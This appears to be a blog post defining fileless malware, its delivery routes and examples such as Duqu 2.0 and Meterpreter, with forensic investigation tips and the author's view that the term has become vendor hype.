What is A fileless Malware?
Fileless malware initially was considered to be malicious software that exists exclusively in computer memory, no evidence of presence in the storage whatsoever.
How is Fileless Malware Delivered?
Fileless malware can be delivered by various means such as
- Phishing and social engineering
- Malicious browser extensions
- Operating system exploits that allows delivery of malicious codes to memory
Popular Fileless Malware
There are some popularly known fileless malware are.This includes:
- Duqu 2.0: The Duqu 2.0 malware was detected by kasperky researchers who discovered that the malware had gone undetected for six months on the network.
- Meterpreter: This is widely known and used by security experts who are familiar with the Metasploit Framework, the bad guys also use meterpreter in exploits to gain remote control of computer systems. Meterpreter runs only in memory and it can be delivered remotely via known exploits that exist in the operating system.
The definition of fileless malware has broadened a little and it entails abusing Operating System resources to perform malicious actions.
This definition mostly applies to Windows Operating System because the resources abused are usually PowerShell and Windows Management Instrumentation (WMI). This is the definition that many experts are accustomed to and the major assertion now is that PowerShell attacks are fileless attacks.
These PowerShell attacks are usually obfuscated scripts (sometimes not obfuscated) written in files with “.ps1” extension. Does the fact that there is a script file not erase the “fileless” aspect of the malware?
Sometimes little PowerShell scripts are delivered to the target system and that short script downloads a much larger malware script stored somewhere on the internet. The malware code does not reside on the system storage but if proper investigation is carried out the malware script can be traced from the short script unless perhaps it has been deleted from the internet.
To maintain persistence, fileless malware alters Windows Registry, Start Up folders, other files and folders that might help in achieving the goal thereby leaving artifacts in the system storage which makes investigation easier for forensics experts.
Investigation of FilessMalware
- The investigation of fileless malware can be very cumbersome because of the absence in storage, so the first thing to do is to get the system memory dump because the memory is volatile and data in memory is easily lost with system start up.
- Checking the integrity of the Registry and Start up folder might reveal more information if the malware tries to maintain persistence or tries to carry out storage intensive actions.
- Network capture is important in the investigation of fileless malware but it is rarely available because individuals and organizations rarely capture and store network packets. The network traffic will show how the malware was delivered and will possibly show all the communications that occurred in readable format if it is not encrypted.
- PowerShell scripts are quite easy to investigate because the commands are clearly written so a forensic expert who understands PowerShell scripting can easily read through the scripts and know the malware’s intentions and see all the actions the malware carried out (including alterations to registry, files and folders) and attempt to reverse those actions.
- In some cases, the script files are encoded mostly in base64, this can be easily decoded with several base64 decoders on the internet.
While fileless malware truly exists, security companies and vendors now abuse the concept to put fear in the hearts of potential clients and the public making it more of a “hype” word just like Artificial Intelligence (which is a topic for another day). The abuse of the concept is distracting security experts and researchers from the real problem we have in front of us.
I agree that fileless malware is malware that is delivered directly to the system memory.I don’t believe PowerShell scripts run from files stored on computers’ storage are fileless malware.
What do you think?Share your thoughts with us via the comment section